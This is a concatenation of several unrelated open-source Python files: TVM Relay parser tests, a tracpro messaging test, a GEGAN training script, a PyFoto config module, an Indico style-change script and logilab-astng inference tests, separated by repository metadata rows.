assert isinstance(parse_text("1").data, tvm.nd.NDArray)
assert get_scalar(parse_text("1")) == 1
assert get_scalar(parse_text("10")) == 10
assert get_scalar(parse_text("0")) == 0
assert get_scalar(parse_text("-100")) == -100
assert get_scalar(parse_text("-05")) == -5
def test_float_literal():
assert get_scalar(parse_text("1.0f")) == 1.0
assert isclose(get_scalar(parse_text("1.56667f")), 1.56667)
assert get_scalar(parse_text("0.0f")) == 0.0
assert get_scalar(parse_text("-10.0f")) == -10.0
# scientific notation
assert isclose(get_scalar(parse_text("1e-1f")), 1e-1)
assert get_scalar(parse_text("1e+1f")) == 1e1
assert isclose(get_scalar(parse_text("1E-1f")), 1e-1)
assert get_scalar(parse_text("1E+1f")) == 1e1
assert isclose(get_scalar(parse_text("1.0e-1f")), 1.0e-1)
assert get_scalar(parse_text("1.0e+1f")) == 1.0e1
assert isclose(get_scalar(parse_text("1.0E-1f")), 1.0e-1)
assert get_scalar(parse_text("1.0E+1f")) == 1.0e1
def test_bool_literal():
assert get_scalar(parse_text("True")) == True
assert get_scalar(parse_text("False")) == False
def test_negative():
# need to handle parsing non-literal operations
# assert isinstance(parse_text("let %x = 1; -%x").body, relay.Call)
assert get_scalar(parse_text("--10")) == 10
assert get_scalar(parse_text("---10")) == -10
def test_bin_op():
for bin_op in BINARY_OPS.keys():
assert_parses_as(
"1 {} 1".format(bin_op), BINARY_OPS.get(bin_op)(relay.const(1), relay.const(1))
)
def test_parens():
assert graph_equal(parse_text("1 * 1 + 1"), parse_text("(1 * 1) + 1"))
assert not graph_equal(parse_text("1 * 1 + 1"), parse_text("1 * (1 + 1)"))
def test_op_assoc():
assert graph_equal(parse_text("1 * 1 + 1 < 1 == 1"), parse_text("(((1 * 1) + 1) < 1) == 1"))
assert graph_equal(parse_text("1 == 1 < 1 + 1 * 1"), parse_text("1 == (1 < (1 + (1 * 1)))"))
def test_vars():
# var
var = parse_text("let %foo = (); %foo")
assert isinstance(var.body, relay.Var)
assert var.body.name_hint == "foo"
# global var
global_var = parse_text("@foo")
assert isinstance(global_var, relay.GlobalVar)
assert global_var.name_hint == "foo"
# operator id
op = parse_text("add")
assert isinstance(op, tvm.ir.Op)
assert op.name == "add"
# operator id with prefix
op = parse_text("nn.global_avg_pool2d")
assert isinstance(op, tvm.ir.Op)
assert op.name == "nn.global_avg_pool2d"
def test_meta_ref():
with pytest.raises(tvm.error.DiagnosticError):
meta_op = parse_text("meta[type_key][1337]")
assert meta_op.attrs.node_type_key == "type_key"
assert meta_op.attrs.node_index == 1337
def test_let():
assert_parses_as("let %x = 1; ()", relay.Let(X, relay.const(1), UNIT))
assert_parses_as(
"""
let %x = 1;
let %y = 2;
()
""",
relay.Let(X, relay.const(1), relay.Let(Y, relay.const(2), UNIT)),
)
def test_seq():
assert_parses_as("(); ()", relay.Let(_, UNIT, UNIT))
assert_parses_as("let %_ = 1; ()", relay.Let(X, relay.const(1), UNIT))
def test_graph():
code = "%0 = (); %1 = 1; (%0, %0, %1)"
assert_parses_as(code, relay.Tuple([UNIT, UNIT, relay.const(1)]))
def test_graph_single():
assert_parses_as("%1 = (); %1", relay.Tuple([]))
def test_let_global_var():
with pytest.raises(tvm.error.DiagnosticError):
parse_text("let @x = 1; ()")
def test_let_op():
with pytest.raises(tvm.error.DiagnosticError):
parse_text("let x = 1; ()")
def test_tuple():
assert_parses_as("()", relay.Tuple([]))
assert_parses_as("(0,)", relay.Tuple([relay.const(0)]))
assert_parses_as("(0, 1)", relay.Tuple([relay.const(0), relay.const(1)]))
assert_parses_as("(0, 1, 2)", relay.Tuple([relay.const(0), relay.const(1), relay.const(2)]))
def test_tuple_proj():
x = relay.var("x", shape=())
assert_parses_as(
"free_var %x: float32; %x((%x,).0, %x)",
relay.Call(x, [relay.TupleGetItem(relay.Tuple([x]), 0), x]),
)
def test_func():
# 0 args
assert_parses_as("fn () { 0 }", relay.Function([], relay.const(0), None, []))
# 1 arg
assert_parses_as("fn (%x) { %x }", relay.Function([X], X, None, []))
# 2 args
assert_parses_as("fn (%x, %y) { %x + %y }", relay.Function([X, Y], relay.add(X, Y), None, []))
# annotations
assert_parses_as("fn (%x: int32) -> int32 { %x }", relay.Function([X_ANNO], X_ANNO, int32, []))
# Refactor the attribute syntax and printing.
#
# # attributes
# assert_parses_as(
# "fn (n=5) { () }",
# relay.Function([], UNIT, None, None, tvm.ir.make_node("DictAttrs", n=relay.const(5)))
# )
# TODO(@jmp): Crashes if %x isn't annnotated.
def test_defn():
id_defn = parse_module(
"""
def @id(%x: int32) -> int32 {
%x
}
"""
)
assert isinstance(id_defn, tvm.IRModule)
def test_recursive_call():
id_defn = parse_module(
"""
def @id(%x: int32) -> int32 {
@id(%x)
}
"""
)
assert isinstance(id_defn, tvm.IRModule)
def test_ifelse():
assert_parses_as(
"""
if (True) {
0
} else {
1
}
""",
relay.If(relay.const(True), relay.const(0), relay.const(1)),
)
def test_ifelse_scope():
with pytest.raises(tvm.error.DiagnosticError):
parse_text(
"""
if (True) {
let %x = ();
()
} else {
%x
}
"""
)
def test_ref():
program = """
#[version = "0.0.5"]
def @main(%x: float32) {
%0 = ref(%x);
ref_write(%0, 1f);
ref_read(%0)
}
"""
tvm.parser.parse(program)
def test_call():
# select right function to call: simple ident case
id_func = relay.Var("id")
assert_parses_as(
"""
let %id = fn (%x) { %x };
10 * %id(10)
""",
relay.Let(
id_func,
relay.Function([X], X, None, []),
relay.multiply(relay.const(10), relay.Call(id_func, [relay.const(10)])),
),
)
# 0 args
constant = relay.Var("constant")
assert_parses_as(
"""
let %constant = fn () { 0 };
%constant()
""",
relay.Let(
constant,
relay.Function([], relay.const(0), None, []),
relay.Call(constant, [], None, None),
),
)
# 1 arg
id_var = relay.Var("id")
assert_parses_as(
"""
let %id = fn (%x) { %x };
%id(1)
""",
relay.Let(
id_var,
relay.Function([X], X, None, []),
relay.Call(id_var, [relay.const(1)], None, None),
),
)
# 2 args
multiply = relay.Var("multiply")
assert_parses_as(
"""
let %multiply = fn (%x, %y) { %x * %y };
%multiply(0, 0)
""",
relay.Let(
multiply,
relay.Function([X, Y], relay.multiply(X, Y), None, []),
relay.Call(multiply, [relay.const(0), relay.const(0)], None, None),
),
)
# anonymous function
assert_parses_as(
"""
(fn (%x) { %x })(0)
""",
relay.Call(relay.Function([X], X, None, []), [relay.const(0)], None, None),
)
# curried function
curried_mult = relay.Var("curried_mult")
assert_parses_as(
"""
let %curried_mult =
fn (%x) {
fn (%y) {
%x * %y
}
};
%curried_mult(0);
%curried_mult(0)(0)
""",
relay.Let(
curried_mult,
relay.Function([X], relay.Function([Y], relay.multiply(X, Y), None, []), None, []),
relay.Let(
_,
relay.Call(curried_mult, [relay.const(0)], None, None),
relay.Call(
relay.Call(curried_mult, [relay.const(0)], None, None),
[relay.const(0)],
None,
None,
),
),
),
)
# op
assert_parses_as("abs(1)", relay.Call(relay.op.get("abs"), [relay.const(1)], None, None))
# Types
def test_incomplete_type():
assert_parses_as("let %_ : _ = (); ()", relay.Let(_, UNIT, UNIT))
def test_builtin_types():
for builtin_type in TYPES:
parse_text("let %_ : {} = (); ()".format(builtin_type))
def test_tensor_type():
assert_parses_as(
"let %_ : Tensor[(), float32] = (); ()",
relay.Let(relay.Var("_", relay.TensorType((), "float32")), UNIT, UNIT),
)
assert_parses_as(
"let %_ : Tensor[(1), float32] = (); ()",
relay.Let(relay.Var("_", relay.TensorType((1,), "float32")), UNIT, UNIT),
)
assert_parses_as(
"let %_ : Tensor[(1, 1), float32] = (); ()",
relay.Let(relay.Var("_", relay.TensorType((1, 1), "float32")), UNIT, UNIT),
)
assert_parses_as(
"let %_ : Tensor[(?, 1), float32] = (); ()",
relay.Let(relay.Var("_", relay.TensorType((tvm.tir.Any(), 1), "float32")), UNIT, UNIT),
)
def test_function_type():
assert_parses_as(
"""
let %_: fn () -> int32 = fn () -> int32 { 0 }; ()
""",
relay.Let(
relay.Var("_", relay.FuncType([], int32, [], [])),
relay.Function([], relay.const(0), int32, []),
UNIT,
),
)
assert_parses_as(
"""
let %_: fn (int32) -> int32 = fn (%x: int32) -> int32 { 0 }; ()
""",
relay.Let(
relay.Var("_", relay.FuncType([int32], int32, [], [])),
relay.Function([relay.Var("x", int32)], relay.const(0), int32, []),
UNIT,
),
)
assert_parses_as(
"""
let %_: fn (int32, int32) -> int32 = fn (%x: int32, %y: int32) -> int32 { 0 }; ()
""",
relay.Let(
relay.Var("_", relay.FuncType([int32, int32], int32, [], [])),
relay.Function(
[relay.Var("x", int32), relay.Var("y", int32)], relay.const(0), int32, []
),
UNIT,
),
)
def test_tuple_type():
assert_parses_as(
"""
let %_: () = (); ()
""",
relay.Let(relay.Var("_", relay.TupleType([])), UNIT, UNIT),
)
assert_parses_as(
"""
let %_: (int32,) = (0,); ()
""",
relay.Let(relay.Var("_", relay.TupleType([int32])), relay.Tuple([relay.const(0)]), UNIT),
)
assert_parses_as(
"""
let %_: (int32, int32) = (0, 1); ()
""",
relay.Let(
relay.Var("_", relay.TupleType([int32, int32])),
relay.Tuple([relay.const(0), relay.const(1)]),
UNIT,
),
)
def test_adt_defn():
mod = tvm.IRModule()
glob_typ_var = relay.GlobalTypeVar("Ayy")
prog = relay.TypeData(glob_typ_var, [], [relay.Constructor("Nil", [], glob_typ_var)])
mod[glob_typ_var] = prog
assert_parse_module_as(
"""
type Ayy { Nil }
""",
mod,
)
def test_adt_any():
code = """
type my_dtype {
my_cons(Tensor[(?, 1), uint16]),
}
"""
mod = parse_module(code)
items = mod.type_definitions.items()
global_type_var, type_data = items[0]
assert global_type_var.name_hint == "my_dtype"
ctors = type_data.constructors
assert len(ctors) == 1
my_cons = ctors[0]
assert my_cons.name_hint == "my_cons"
ty_shape = my_cons.inputs[0].shape
assert isinstance(ty_shape[0], tvm.tir.Any)
assert ty_shape[1] == 1
def test_empty_adt_defn():
mod = tvm.IRModule()
glob_typ_var = relay.GlobalTypeVar("Ayy")
prog = relay.TypeData(glob_typ_var, [], [])
mod[glob_typ_var] = prog
assert_parse_module_as(
"""
type Ayy { }
""",
mod,
)
def test_multiple_cons_defn():
mod = tvm.IRModule()
list_var = relay.GlobalTypeVar("List")
typ_var = relay.TypeVar("A")
prog = relay.TypeData(
list_var,
[typ_var],
[
relay.Constructor("Cons", [typ_var, list_var(typ_var)], list_var),
relay.Constructor("Nil", [], list_var),
],
)
mod[list_var] = prog
assert_parse_module_as(LIST_DEFN, mod)
def test_multiple_type_param_defn():
glob_typ_var = relay.GlobalTypeVar("Either")
typ_var_a = relay.TypeVar("A")
typ_var_b = relay.TypeVar("B")
prog = relay.TypeData(
glob_typ_var,
[typ_var_a, typ_var_b],
[
relay.Constructor("Left", [typ_var_a], glob_typ_var),
relay.Constructor("Right", [typ_var_b], glob_typ_var),
],
)
mod = tvm.IRModule()
mod[glob_typ_var] = prog
assert_parse_module_as(
"""
type Either[A, B] {
Left(A),
Right(B),
}
""",
mod,
)
def test_match():
# pair each match keyword with whether it specifies a complete match or not
match_keywords = [("match", True), ("match?", False)]
for (match_keyword, is_complete) in match_keywords:
mod = tvm.IRModule()
list_var = relay.GlobalTypeVar("List")
typ_var = relay.TypeVar("A")
cons_constructor = relay.Constructor("Cons", [typ_var, list_var(typ_var)], list_var)
nil_constructor = relay.Constructor("Nil", [], list_var)
list_def = relay.TypeData(list_var, [typ_var], [cons_constructor, nil_constructor])
mod[list_var] = list_def
length_var = relay.GlobalVar("length")
typ_var = relay.TypeVar("A")
input_type = list_var(typ_var)
input_var = relay.Var("xs", input_type)
rest_var = relay.Var("rest")
cons_case = relay.Let(
relay.var("", type_annotation=None),
UNIT,
relay.add(relay.const(1), relay.Call(length_var, [rest_var])),
)
body = relay.Match(
input_var,
[
relay.Clause(
relay.PatternConstructor(
cons_constructor, [relay.PatternWildcard(), relay.PatternVar(rest_var)]
),
cons_case,
),
relay.Clause(relay.PatternConstructor(nil_constructor, []), relay.const(0)),
],
complete=is_complete,
)
length_func = relay.Function([input_var], body, int32, [typ_var])
mod[length_var] = length_func
assert_parse_module_as(
"""
%s
def @length[A](%%xs: List[A]) -> int32 {
%s (%%xs) {
Cons(_, %%rest : List[A]) => {
();
1 + @length(%%rest)
},
Nil => 0,
}
}
"""
% (LIST_DEFN, match_keyword),
mod,
)
def test_adt_cons_expr():
mod = tvm.IRModule()
list_var = relay.GlobalTypeVar("List")
typ_var = relay.TypeVar("A")
cons_constructor = relay.Constructor("Cons", [typ_var, list_var(typ_var)], list_var)
nil_constructor = relay.Constructor("Nil", [], list_var)
list_def = relay.TypeData(list_var, [typ_var], [cons_constructor, nil_constructor])
mod[list_var] = list_def
make_singleton_var = relay.GlobalVar("make_singleton")
input_var = relay.Var("x", int32)
make_singleton_func = relay.Function(
[input_var], cons_constructor(input_var, nil_constructor()), list_var(int32)
)
mod[make_singleton_var] = make_singleton_func
assert_parse_module_as(
"""
%s
def @make_singleton(%%x: int32) -> List[int32] {
Cons(%%x, Nil)
}
"""
% LIST_DEFN,
mod,
)
def test_duplicate_adt_defn():
with pytest.raises(tvm.error.DiagnosticError):
parse_module(
"""
%s
type List[A] {
Cons(A, List[A]),
Nil,
}
"""
% LIST_DEFN
)
def test_duplicate_adt_cons():
with pytest.raises(tvm.error.DiagnosticError):
parse_text(
"""
type Ayy { Lmao }
type Haha { Lmao }
"""
)
def test_duplicate_adt_cons_defn():
with pytest.raises(tvm.error.DiagnosticError):
parse_text(
"""
type Ayy { Lmao }
type Lmao { Ayy }
"""
)
def test_duplicate_global_var():
with pytest.raises(tvm.error.DiagnosticError):
parse_text(
"""
def @id[A](%x: A) -> A { x }
def @id[A](%x: A) -> A { x }
"""
)
def test_extern_adt_defn():
mod = tvm.IRModule()
extern_var = relay.GlobalTypeVar("T")
typ_var = relay.TypeVar("A")
extern_def = relay.TypeData(extern_var, [typ_var], [])
mod[extern_var] = extern_def
assert_parse_module_as(
"""
extern type T[A]
""",
mod,
)
def test_import_grad():
mod = tvm.IRModule()
mod.import_from_std("gradient.rly")
def test_resnet():
mod, _ = relay.testing.resnet.get_workload()
text = mod.astext()
parsed_mod = tvm.parser.parse(text)
tvm.ir.assert_structural_equal(mod, parsed_mod)
def inline_params(mod, params):
main_fn = mod["main"]
str_to_var = {}
for param in main_fn.params:
str_to_var[param.name_hint] = param
bind_map = {}
for param in params:
bind_map[str_to_var[param]] = relay.const(params[param])
body = relay.bind(main_fn.body, bind_map)
main_fn = relay.Function(relay.analysis.free_vars(body), body)
mod._add("main", main_fn, True)
return mod
def test_resnet_inlined_params():
mod, params = relay.testing.resnet.get_workload()
mod = inline_params(mod, params)
mod = relay.transform.InferType()(mod)
text = mod.astext()
parsed_mod = tvm.parser.parse(text)
tvm.ir.assert_structural_equal(mod, parsed_mod)
def test_tuple_return_value():
program = """
type Box[T] {
constructor(T)
}
def @example() {
%0 = ();
%1 = constructor(%0);
%2 = constructor(0f);
(%1, %2,)
}
"""
parse_module(program)
def test_op_string_attr():
call = parse_text(
"""
free_var %x: Tensor[(1, 32, 32, 3), float32];
free_var %y: Tensor[(1, 1, 3, 3), float32];
nn.conv2d(%x, %y, data_layout="NHWC", kernel_layout="HWIO")
"""
)
assert isinstance(call.op, tvm.ir.Op)
assert call.op.name == "nn.conv2d"
assert call.attrs.data_layout == "NHWC"
assert call.attrs.kernel_layout == "HWIO"
def test_load_prelude():
mod = tvm.IRModule()
mod.import_from_std("prelude.rly")
tvm.parser.parse(mod.astext())
if __name__ == "__main__":
import sys
pytest.main(sys.argv)
| apache-2.0 | -6,946,301,590,166,049,000 | 24.094235 | 99 | 0.522377 | false |
ewheeler/tracpro | tracpro/msgs/tests.py | 1 | 4100 | from __future__ import absolute_import, unicode_literals
from django.core.urlresolvers import reverse
from django.test.utils import override_settings
from django.utils import timezone
from mock import patch
from temba.types import Broadcast
from tracpro.msgs.models import Message, COHORT_ALL, COHORT_RESPONDENTS, COHORT_NONRESPONDENTS
from tracpro.polls.models import Issue, Response, RESPONSE_COMPLETE, RESPONSE_PARTIAL, RESPONSE_EMPTY
from tracpro.test import TracProTest
class MessageTest(TracProTest):
@override_settings(CELERY_ALWAYS_EAGER=True, CELERY_EAGER_PROPAGATES_EXCEPTIONS=True, BROKER_BACKEND='memory')
@patch('dash.orgs.models.TembaClient.create_broadcast')
def test_create(self, mock_create_broadcast):
mock_create_broadcast.return_value = Broadcast.create()
now = timezone.now()
# create non-regional issue with 3 responses (1 complete, 1 partial, 1 empty)
issue1 = Issue.objects.create(poll=self.poll1, region=None, conducted_on=timezone.now())
Response.objects.create(flow_run_id=123, issue=issue1, contact=self.contact1,
created_on=now, updated_on=now, status=RESPONSE_COMPLETE)
Response.objects.create(flow_run_id=234, issue=issue1, contact=self.contact2,
created_on=now, updated_on=now, status=RESPONSE_PARTIAL)
Response.objects.create(flow_run_id=345, issue=issue1, contact=self.contact4,
created_on=now, updated_on=now, status=RESPONSE_EMPTY)
msg1 = Message.create(self.unicef, self.admin, "Test #1", issue1, COHORT_ALL, None)
self.assertEqual(msg1.org, self.unicef)
self.assertEqual(msg1.sent_by, self.admin)
self.assertIsNotNone(msg1.sent_on)
self.assertEqual(msg1.text, "Test #1")
self.assertEqual(msg1.issue, issue1)
self.assertEqual(msg1.cohort, COHORT_ALL)
self.assertEqual(msg1.region, None)
self.assertEqual(list(msg1.recipients.order_by('pk')), [self.contact1, self.contact2, self.contact4])
self.assertEqual(unicode(msg1), "Test #1")
self.assertEqual(msg1.as_json(), dict(id=msg1.pk, recipients=3))
msg2 = Message.create(self.unicef, self.admin, "Test #1", issue1, COHORT_RESPONDENTS, None)
self.assertEqual(msg2.cohort, COHORT_RESPONDENTS)
self.assertEqual(msg2.region, None)
self.assertEqual(list(msg2.recipients.order_by('pk')), [self.contact1])
msg3 = Message.create(self.unicef, self.admin, "Test #1", issue1, COHORT_NONRESPONDENTS, None)
self.assertEqual(msg3.cohort, COHORT_NONRESPONDENTS)
self.assertEqual(msg3.region, None)
self.assertEqual(list(msg3.recipients.order_by('pk')), [self.contact2, self.contact4])
msg4 = Message.create(self.unicef, self.admin, "Test #1", issue1, COHORT_ALL, self.region1)
self.assertEqual(msg4.cohort, COHORT_ALL)
self.assertEqual(msg4.region, self.region1)
self.assertEqual(list(msg4.recipients.order_by('pk')), [self.contact1, self.contact2])
class MessageCRUDLTest(TracProTest):
def test_list(self):
url = reverse('msgs.message_list')
# create a non-regional issue
issue1 = Issue.objects.create(poll=self.poll1, region=None, conducted_on=timezone.now())
# send 1 message to all regions and 2 more to specific regions
msg1 = Message.create(self.unicef, self.admin, "Test to all", issue1, COHORT_ALL, None)
msg2 = Message.create(self.unicef, self.admin, "Test to region #1", issue1, COHORT_ALL, self.region1)
msg3 = Message.create(self.unicef, self.admin, "Test to region #2", issue1, COHORT_ALL, self.region2)
self.login(self.admin)
response = self.url_get('unicef', url)
self.assertEqual(list(response.context['object_list']), [msg3, msg2, msg1])
self.switch_region(self.region1)
# should still include message sent to all regions
response = self.url_get('unicef', url)
self.assertEqual(list(response.context['object_list']), [msg2, msg1])
| bsd-3-clause | -3,310,450,870,934,221,300 | 50.25 | 114 | 0.688537 | false |
xhchrn/gegan | train.py | 1 | 3732 | # -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import absolute_import
import tensorflow as tf
import argparse
from model.gegan import GEGAN
parser = argparse.ArgumentParser(description='Train')
parser.add_argument('--experiment_dir', dest='experiment_dir', required=True,
help='experiment directory, data, samples,checkpoints,etc')
parser.add_argument('--experiment_id', dest='experiment_id', type=int, default=0,
help='sequence id for the experiments you prepare to run')
parser.add_argument('--image_size', dest='image_size', type=int, default=64,
help="size of your input and output image")
parser.add_argument('--L1_penalty', dest='L1_penalty', type=int, default=100, help='weight for L1 loss')
parser.add_argument('--Lconst_penalty', dest='Lconst_penalty', type=int, default=15, help='weight for const loss')
parser.add_argument('--Ltv_penalty', dest='Ltv_penalty', type=float, default=0.0, help='weight for tv loss')
parser.add_argument('--Lcategory_penalty', dest='Lcategory_penalty', type=float, default=1.0,
help='weight for category loss')
parser.add_argument('--embedding_num', dest='embedding_num', type=int, default=2,
help="number for distinct embeddings")
parser.add_argument('--embedding_dim', dest='embedding_dim', type=int, default=64, help="dimension for embedding")
parser.add_argument('--epoch', dest='epoch', type=int, default=100, help='number of epoch')
parser.add_argument('--batch_size', dest='batch_size', type=int, default=16, help='number of examples in batch')
parser.add_argument('--lr', dest='lr', type=float, default=0.001, help='initial learning rate for adam')
parser.add_argument('--schedule', dest='schedule', type=int, default=10, help='number of epochs to half learning rate')
parser.add_argument('--resume', dest='resume', type=int, default=1, help='resume from previous training')
parser.add_argument('--freeze_encoder', dest='freeze_encoder', type=int, default=0,
help="freeze encoder weights during training")
parser.add_argument('--fine_tune', dest='fine_tune', type=str, default=None,
help='specific labels id to be fine tuned')
parser.add_argument('--inst_norm', dest='inst_norm', type=int, default=0,
help='use conditional instance normalization in your model')
parser.add_argument('--sample_steps', dest='sample_steps', type=int, default=10,
help='number of batches in between two samples are drawn from validation set')
parser.add_argument('--checkpoint_steps', dest='checkpoint_steps', type=int, default=500,
help='number of batches in between two checkpoints')
args = parser.parse_args()
def main(_):
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
with tf.Session(config=config) as sess:
model = GEGAN(args.experiment_dir, batch_size=args.batch_size, experiment_id=args.experiment_id,
input_width=args.image_size, output_width=args.image_size, embedding_num=args.embedding_num,
embedding_dim=args.embedding_dim, L1_penalty=args.L1_penalty, Lconst_penalty=args.Lconst_penalty,
Ltv_penalty=args.Ltv_penalty, Lcategory_penalty=args.Lcategory_penalty)
model.register_session(sess)
model.build_model(is_training=True, inst_norm=args.inst_norm)
model.train(lr=args.lr, epoch=args.epoch, resume=args.resume,
schedule=args.schedule, freeze_encoder=args.freeze_encoder,
sample_steps=args.sample_steps, checkpoint_steps=args.checkpoint_steps)
if __name__ == '__main__':
tf.app.run()
| apache-2.0 | -6,427,230,271,344,068,000 | 61.2 | 119 | 0.681404 | false |
cdgriffith/PyFoto | pyfoto/config.py | 1 | 2058 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
import os
import logging
import yaml
import reusables
default_config = dict(
storage_directory="storage",
# TODO add {date}, {time}, {type}, {hash}, {size}
dir_names="{increment}",
file_names="{increment}.{ext}",
remove_source=False,
folder_limit=1000,
ignore_duplicates=False,
dir_inc=0,
file_inc=0,
connect_string="sqlite:///pyfoto.sqlite"
)
def get_config(config_file: str="config.yaml") -> reusables.Namespace:
"""
:param config_file:
:return:
"""
config = default_config.copy()
if os.path.exists(config_file):
with open(config_file) as f:
config.update(yaml.load(f))
else:
logger.warning('Config file "{0}" does not exist, using '
'defaults which will be saved to it'.format(config_file))
logger.debug("Loaded Config - {0}".format(config))
return reusables.Namespace(**config)
def save_config(config: dict, config_file: str="config.yaml") -> None:
"""
:param config:
:param config_file:
:return:
"""
out_config = config.copy()
dir_path = os.path.dirname(config_file)
if dir_path and not os.path.exists(dir_path):
logger.warning("Attempting to create new path to config file: "
"{0}".format(dir_path))
os.makedirs(dir_path, exist_ok=True)
with open(config_file, "w") as f:
yaml.dump(out_config, f, default_flow_style=False)
logger.debug("Saved config - {0}".format(out_config))
def get_stream_logger(module, level: int=0):
new_logger = logging.getLogger("PyFoto.{}".format(module))
sh = logging.StreamHandler()
if level > 0:
sh.setLevel(level)
formatter = logging.Formatter('%(asctime)s - %(name)s - '
'%(levelname)s - %(message)s')
sh.setFormatter(formatter)
new_logger.addHandler(sh)
if level > 0:
new_logger.setLevel(level)
return new_logger
logger = get_stream_logger("config", level=0)
| mit | -5,122,755,118,486,069,000 | 24.407407 | 80 | 0.606414 | false |
Ictp/indico | bin/utils/changeStyle.py | 1 | 1781 | # -*- coding: utf-8 -*-
##
##
## This file is part of Indico.
## Copyright (C) 2002 - 2014 European Organization for Nuclear Research (CERN).
##
## Indico is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 3 of the
## License, or (at your option) any later version.
##
## Indico is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Indico;if not, see <http://www.gnu.org/licenses/>.
from indico.core.db import DBMgr
from MaKaC.webinterface import displayMgr
from MaKaC.conference import CategoryManager
logfile=open('./oldstyles','w')
def changeCatStyle(cat):
for subcat in cat.getSubCategoryList():
currentStyle=subcat.getDefaultStyle("meeting")
subcat.setDefaultStyle("meeting", "lhcb_meeting")
logfile.write("cat %s: %s"%(subcat.getId(), currentStyle))
changeCatStyle(subcat)
for conf in cat.getConferenceList():
currentStyle=displayMgr.ConfDisplayMgrRegistery().getDisplayMgr(conf).getDefaultStyle()
displayMgr.ConfDisplayMgrRegistery().getDisplayMgr(conf).setDefaultStyle("lhcb_meeting")
logfile.write("\t\t\tconf %s: %s"%(conf.getId(), currentStyle))
dbm = DBMgr.getInstance()
dbm.startRequest()
cat=CategoryManager().getById('233')
currentStyle=cat.getDefaultStyle("meeting")
cat.setDefaultStyle("meeting", "lhcb_meeting")
logfile.write("cat %s: %s"%(cat.getId(), currentStyle))
changeCatStyle(cat)
dbm.endRequest()
| gpl-3.0 | -5,476,135,551,570,129,000 | 37.717391 | 96 | 0.732734 | false |
tkaitchuck/nupic | external/common/lib/python2.6/site-packages/logilab/astng/test/unittest_inference.py | 1 | 41136 | # copyright 2003-2010 Sylvain Thenault, all rights reserved.
# contact mailto:[email protected]
#
# This file is part of logilab-astng.
#
# logilab-astng is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 2.1 of the License, or (at your
# option) any later version.
#
# logilab-astng is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License
# for more details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with logilab-astng. If not, see <http://www.gnu.org/licenses/>.
"""tests for the astng inference capabilities
"""
from os.path import join, dirname, abspath
import sys
from StringIO import StringIO
from logilab.common.testlib import TestCase, unittest_main
from logilab.astng import InferenceError, builder, nodes
from logilab.astng.inference import infer_end as inference_infer_end
from logilab.astng.bases import YES, Instance, BoundMethod, UnboundMethod,\
path_wrapper, BUILTINS_NAME
def get_name_node(start_from, name, index=0):
return [n for n in start_from.nodes_of_class(nodes.Name) if n.name == name][index]
def get_node_of_class(start_from, klass):
return start_from.nodes_of_class(klass).next()
builder = builder.ASTNGBuilder()
class InferenceUtilsTC(TestCase):
def test_path_wrapper(self):
def infer_default(self, *args):
raise InferenceError
infer_default = path_wrapper(infer_default)
infer_end = path_wrapper(inference_infer_end)
self.failUnlessRaises(InferenceError,
infer_default(1).next)
self.failUnlessEqual(infer_end(1).next(), 1)
if sys.version_info < (3, 0):
EXC_MODULE = 'exceptions'
else:
EXC_MODULE = BUILTINS_NAME
class InferenceTC(TestCase):
CODE = '''
class C(object):
"new style"
attr = 4
def meth1(self, arg1, optarg=0):
var = object()
print ("yo", arg1, optarg)
self.iattr = "hop"
return var
def meth2(self):
self.meth1(*self.meth3)
def meth3(self, d=attr):
b = self.attr
c = self.iattr
return b, c
ex = Exception("msg")
v = C().meth1(1)
m_unbound = C.meth1
m_bound = C().meth1
a, b, c = ex, 1, "bonjour"
[d, e, f] = [ex, 1.0, ("bonjour", v)]
g, h = f
i, (j, k) = "glup", f
a, b= b, a # Gasp !
'''
astng = builder.string_build(CODE, __name__, __file__)
def test_module_inference(self):
infered = self.astng.infer()
obj = infered.next()
self.failUnlessEqual(obj.name, __name__)
self.failUnlessEqual(obj.root().name, __name__)
self.failUnlessRaises(StopIteration, infered.next)
def test_class_inference(self):
infered = self.astng['C'].infer()
obj = infered.next()
self.failUnlessEqual(obj.name, 'C')
self.failUnlessEqual(obj.root().name, __name__)
self.failUnlessRaises(StopIteration, infered.next)
def test_function_inference(self):
infered = self.astng['C']['meth1'].infer()
obj = infered.next()
self.failUnlessEqual(obj.name, 'meth1')
self.failUnlessEqual(obj.root().name, __name__)
self.failUnlessRaises(StopIteration, infered.next)
def test_builtin_name_inference(self):
infered = self.astng['C']['meth1']['var'].infer()
var = infered.next()
self.failUnlessEqual(var.name, 'object')
self.failUnlessEqual(var.root().name, BUILTINS_NAME)
self.failUnlessRaises(StopIteration, infered.next)
def test_tupleassign_name_inference(self):
infered = self.astng['a'].infer()
exc = infered.next()
self.assertIsInstance(exc, Instance)
self.failUnlessEqual(exc.name, 'Exception')
self.failUnlessEqual(exc.root().name, EXC_MODULE)
self.failUnlessRaises(StopIteration, infered.next)
infered = self.astng['b'].infer()
const = infered.next()
self.assertIsInstance(const, nodes.Const)
self.failUnlessEqual(const.value, 1)
self.failUnlessRaises(StopIteration, infered.next)
infered = self.astng['c'].infer()
const = infered.next()
self.assertIsInstance(const, nodes.Const)
self.failUnlessEqual(const.value, "bonjour")
self.failUnlessRaises(StopIteration, infered.next)
def test_listassign_name_inference(self):
infered = self.astng['d'].infer()
exc = infered.next()
self.assertIsInstance(exc, Instance)
self.failUnlessEqual(exc.name, 'Exception')
self.failUnlessEqual(exc.root().name, EXC_MODULE)
self.failUnlessRaises(StopIteration, infered.next)
infered = self.astng['e'].infer()
const = infered.next()
self.assertIsInstance(const, nodes.Const)
self.failUnlessEqual(const.value, 1.0)
self.failUnlessRaises(StopIteration, infered.next)
infered = self.astng['f'].infer()
const = infered.next()
self.assertIsInstance(const, nodes.Tuple)
self.failUnlessRaises(StopIteration, infered.next)
def test_advanced_tupleassign_name_inference1(self):
infered = self.astng['g'].infer()
const = infered.next()
self.assertIsInstance(const, nodes.Const)
